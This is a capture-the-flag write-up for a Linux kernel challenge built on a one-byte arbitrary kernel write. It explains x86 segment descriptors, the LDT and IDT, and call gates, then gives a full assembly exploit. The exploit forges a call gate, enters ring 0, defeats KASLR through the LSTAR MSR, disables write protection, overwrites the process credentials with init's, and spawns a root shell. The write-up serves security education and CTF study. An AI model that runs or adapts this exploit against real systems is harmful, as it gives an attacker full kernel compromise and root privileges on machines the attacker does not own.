In this challenge, you could write one byte to an arbitrary kernel address (even one marked read-only, as long as the page is not mapped as executable). This leads to a full compromise of the kernel, even without a KASLR leak.
KASLR is nice, but doesn’t apply everywhere. You can manipulate either the IDT (at `0xfffffe0000000000`) or the LDT (at `0xffff880000000000`), which are mapped read-only at fixed addresses.
Writing to the GDT might also work, but usually there is a context switch after `challenge_write` returns - and since `__switch_to` triggers a GDT reload, the write is discarded.
i386 segments are a wonderful feature (“feature”) that are still around in x86_64 but not really used for everyday programming (`fs` and `gs` are still around, but their bases are set via MSRs now). However, many low-level mechanisms still use them to some extent (e.g. interrupts).
I’ll give a somewhat hand-wavy explanation here; for the actual full details you probably want to study a copy of the Intel SDM (Volume 3A) or AMD Programmer’s Manual (Volume 2). In essence: all of this is a gross oversimplification, so check the manual.
The segment registers (`cs`, `ds`, `es`, `fs`, `gs`, and `ss`) can hold a segment selector. When an instruction references memory through one of those segments, the CPU uses the segment information for additional permission checks. Segments also have a base address by which each access through the segment is offset. This was useful in the 16-bit era, when a machine might have had more memory than a single 16-bit pointer could address. This is why pointers that carry additional segment information are also known as far pointers.
The CPU keeps the segment descriptors that contain all this information in one of two tables, the Global Descriptor Table (GDT) and the Local Descriptor Table (LDT). The GDT is generally CPU-wide (it holds segments like the kernel’s code and data segments, and the default userspace segments), while the LDT is process-configurable.
The descriptor itself contains information on the segment base and limit, and some additional flags including the descriptor’s privilege level (DPL). For example, for code segments this is the CPL at which the code is allowed to run (depending on some other flags).
The segment selector that is actually stored in the registers is really just an index into one of the two descriptor tables: bit 2 (the table indicator) selects whether this is the (CPU-wide) GDT or the (per-process) LDT, the low two bits indicate the selector’s requested privilege level (RPL - this is not the DPL of the actual segment descriptor, nor the current privilege level (CPL)), and bits 3 and up form the actual table index.
Usually, this isn’t too interesting. However, there are also system-segment descriptors that have some additional features. Generally, these are used to support switching to higher privilege levels (e.g. when an interrupt occurs that needs to be handled by kernel code, even though the CPU is currently executing userspace instructions).
For this challenge, there are basically two important types:
Trap gates and/or interrupt gates in the IDT tell the CPU where it can find the interrupt handler for that specific interrupt (they differ only in whether they disable interrupts on entry).
Call gates in the LDT or GDT are very similar. Instead of being invoked by interrupts, they are invoked manually via a far call (`lcall` in AT&T syntax).
Both of these types will - if set up correctly - switch the CPL to the DPL of the code segment that is referenced, and allow switching to CPL 0 this way.
If you run into SMAP troubles, you can easily disable SMAP by setting the `AC` bit in the flags register before switching to CPL 0 - neither of these methods will modify this flag.
Since we know where the IDT is, we can move the interrupt entrypoint around by overwriting part of the address that will be called. If there is a useful gadget near the original entrypoint (that we can reach by changing only one byte), we can control where the kernel resumes execution. Normally, the `int 0x80` entrypoint is `entry_INT80_compat` - but we can instead jump into the middle of an instruction to reach a `jmp rdi` at `entry_INT80_compat+0x17`, transferring control back to a userspace address (remember: while SMAP is enabled, SMEP is disabled).
Another way to gain code execution is to set up a call gate in the LDT. Linux allows you to modify the LDT via the `modify_ldt` syscall, but will filter out call gates. We can register a data segment descriptor with its base and limit set in such a way that, if reinterpreted as a call gate, it will call back into our userspace code. Then, we use the one-byte write to set the type field of the descriptor to actually turn it into a call gate. A far call (rather than `int 0x80`) will then send execution into userspace code, but running at CPL 0.
At this point, the system is in a bit of a weird state. SMAP is disabled (see above), but we still don’t have full access to kernel code. Here are a few problems and how to fix them:
We need to be able to access per-CPU variables via the `gs` segment. For this, just use the `swapgs` instruction.
To leak a KASLR address, you can simply read the `LSTAR` MSR (which contains the kernel entry point for the `syscall` instruction).
Kernel memory is not currently mapped because KPTI is enabled and we are still on the userspace page tables. To switch to the kernel page tables, clear bit 0x1000 in `cr3` (read the kernel code in `entry_64.S` for more info).
The current page is most likely not mapped in the kernel page tables, so the previous step will fail. You can disable write protection (clear the WP bit in `cr0`) and copy your shellcode to the hugepage that contains the syscall entrypoint.
Interrupts can cause chaos if they aren’t yet disabled, so use `cli` to disable them.
Then, do your usual kernel exploitation (e.g. setting `current->cred`), and return to userspace (or not, I guess).
```asm
// gcc -no-pie -nostdlib -Wl,--build-id=none -s pwn.S -o pwn
#include <linux/mman.h>
#include <sys/syscall.h>

.pushsection .text.1
.code64
__syscall_64_fail.L:
	negl %eax
	movl $SYS_exit_group, %eax
	syscall
	ud2
.popsection

.macro check_syscall_64 nr:req, res=%rax
	movl \nr, %eax
	syscall
	test \res, \res
	js __syscall_64_fail.L
.endm

.macro var name:req
	.pushsection .data
	.balign 8
	.local \name
\name:
.endm

.macro endvar name:req
	.local end_\name
end_\name:
	.eqv sizeof_\name, end_\name - \name
	.popsection
.endm

.macro asciz name:req, data:vararg
	var \name
	.asciz \data
	endvar \name
.endm

.macro far_ptr name:req, selector:req, offset:req
	var \name
	.int \offset
	.short \selector
	endvar \name
.endm

.macro fn name:req
	.text
	.code64
	.global \name
\name:
.endm

// <*/fcntl.h> are all C-only
#define O_WRONLY 1

// Yes, ordering in kernel and user mode are different, blame AMD/Intel.
#define __KERNEL_CS (2 * 8)

// For 4-level paging
#define LDT_BASE_ADDR 0xffff880000000000
#define LDT_STRIDE 0x10000
#define PTI_SWITCH_MASK 0x1000

// Arbitrary constants
#define STACK_SIZE 0x80000

// Selectors for the LDT have bit 2 set. Also RPLs
#define LDT_SELECTOR 0b100
#define RPL_KERNEL 0b000
#define RPL_USER 0b011

#define TARGET_ENTRY 12
#define TARGET_SELECTOR ((TARGET_ENTRY << 3) | LDT_SELECTOR | RPL_USER)

// With one descriptor (i.e. a one-byte write): modifiable bits in cs_offset:
//   0x0000000000401000 <- ring0
//   0x00000000ffdfffff
//             |||\___/
//             ||| \____ limit
//             \/\_______ G, D, 0, AV
//              \________ base_addr[31:24]

#define MSR_LSTAR 0xc0000082

#define KASLR_WRITABLE 0xa00000
#define KASLR_LSTAR 0xa00010
#define KASLR_WRITABLE_END 0xc00000
#define KASLR_WRITE_TO 0xbad000
#define KASLR_INIT_TASK 0x1613940

#define PERCPU_CURRENT 0x1fbc0
#define STRUCT_TASK_STRUCT_REAL_CRED 0x0a78
#define STRUCT_TASK_STRUCT_CRED 0x0a80
#define STRUCT_CRED_USAGE 0x0

// TODO: Check that &ring0 == 0x401000
fn ring0
	// Disable interrupts (interrupts cause double faults right now)
	cli

	// Read LSTAR to bypass KASLR
	movl $MSR_LSTAR, %ecx
	rdmsr
	shlq $32, %rdx
	orq %rax, %rdx
	subq $KASLR_LSTAR, %rdx
	movq %rdx, %rbp

	// Disable WP
	movq %cr0, %r8
	andq $(~(1 << 16)), %r8
	movq %r8, %cr0

	// Copy stage 2 to the mapped kernel entry point
	movq %rbp, %rdi
	addq $KASLR_WRITE_TO, %rdi
	movq %rdi, %r15
	leaq ring0_stage2(%rip), %rsi
	movl $sizeof_ring0_stage2, %ecx
	rep movsb

	// Jump there.
	jmp *%r15

var ring0_stage2
	// Get access to per-cpu variables (current, mostly) via swapgs
	swapgs

	// Get the current page table.
	movq %cr3, %rbx

	// Switch to the kernel page table.
	andq $(~PTI_SWITCH_MASK), %rbx
	movq %rbx, %cr3

	// Set current->cred and current->real_cred to init_task->cred
	addq $KASLR_INIT_TASK, %rdx
	movq STRUCT_TASK_STRUCT_CRED(%rdx), %rdx
	addl $2, STRUCT_CRED_USAGE(%rdx)
	movq %gs:PERCPU_CURRENT, %rax
	movq %rdx, STRUCT_TASK_STRUCT_CRED(%rax)
	movq %rdx, STRUCT_TASK_STRUCT_REAL_CRED(%rax)

	// Swap back
	swapgs

	// Switch the page table back around
	orq $PTI_SWITCH_MASK, %rbx
	movq %rbx, %cr3

	// Build an `iret` stackframe rather than a `ret far` stack frame.
	popq %r8              // => %rip
	popq %r9              // => %cs
	pushfq
	orq $(1 << 9), (%rsp) // Set IF in the new RFLAGS (like sti)
	pushq %r9
	pushq %r8
	iretq
endvar ring0_stage2

var user_desc
	// base2 (base_addr[31:24]) == cs_offset[31:24]
	// limit_in_pages           == cs_offset[23]
	// seg_32bit                == cs_offset[22]
	// NB: Because lm is ignored, cs_offset[21] must be 0
	// useable                  == cs_offset[20]
	// limit1 (limit[19:16])    == cs_offset[19:16]
	// flags0                   == (arbitrary, will be overwritten later)
	// base1 (base_addr[23:16]) == (ignored entirely)
	// base0 (base_addr[15:0])  == __KERNEL_CS
	// limit0 (limit[15:0])     == cs_offset[15:0]
	.int TARGET_ENTRY // entry_number
	.int __KERNEL_CS  // base_addr
	.int 0x01000      // limit
	.int 0b00000001   // flags (int because of padding - only the low byte is actually used)
	//   |||||\/\____ .seg_32bit (D) (must be 1 for set_thread_area)
	//   ||||| \_____ .contents (top 2 bits of type, must be 00 or 01 for set_thread_area)
	//   ||||\_______ .read_exec_only (!R)
	//   |||\________ .limit_in_pages (G)
	//   ||\_________ .seg_not_present (!P)
	//   |\__________ .useable (AV)
	//   \___________ .lm (will be ignored)
endvar user_desc

// On the next descriptor, the CPU wants type == 0 here (or you get a #GP(selector)).
// We can't achieve this without another write, but here's what the values mean.
// base2 (base_addr[31:24]) == (ignored)
// flags1                   == (ignored)
// limit1 (limit[19:16])    == (ignored)
// flags0                   == (mostly ignored, except for the type)
// base1 (base_addr[23:16]) == (ignored)
// base0 (base_addr[15:0])  == cs_offset[63:48]
// limit0 (limit[15:0])     == cs_offset[47:32]

var high_desc
	// We need a placeholder so that the LDT is long enough (i.e. contains the
	// cleared descriptor above the target descriptor).
	.int TARGET_ENTRY + 2 // entry_number
	.int 0xffff           // base_addr
	.int 0xffff           // limit
	.int 0b00111000       // flags
endvar high_desc

asciz module_path, "/dev/one_byte"
asciz shell_path, "/bin/sh"

var shell_argv
	.quad shell_path
	.quad 0
endvar shell_argv

var module_message
	.quad LDT_BASE_ADDR + LDT_STRIDE + (TARGET_ENTRY * 8) + 5
	.byte 0b11101100
endvar module_message

.macro modify_ldt desc:req
	movl $sizeof_\desc, %edx
	leaq \desc(%rip), %rsi
	movl $0x11, %edi
	check_syscall_64 $SYS_modify_ldt, %eax // Result is zero-extended from 32 bits for weird ABI reasons.
.endm

fn _start
	// Open device
	xorl %edx, %edx
	movl $O_WRONLY, %esi
	leaq module_path(%rip), %rdi
	check_syscall_64 $SYS_open
	movl %eax, %r15d

	// "stac" in CPL3
	pushfq
	orq $(1 << 18), (%rsp)
	popfq

	// Update the LDT
	modify_ldt user_desc
	modify_ldt high_desc

	// Trigger the overwrite
	movl $sizeof_module_message, %edx
	leaq module_message(%rip), %rsi
	movl %r15d, %edi
	check_syscall_64 $SYS_write

	// Go to CPL 0
	far_ptr gate_target, TARGET_SELECTOR, 0xdead8664
	lcall *(gate_target)

	// Get a shell
	leaq shell_path(%rip), %rdi
	leaq shell_argv(%rip), %rsi
	xorl %edx, %edx
	check_syscall_64 $SYS_execve
	exit_64 $0

// vim:syntax=asm:
```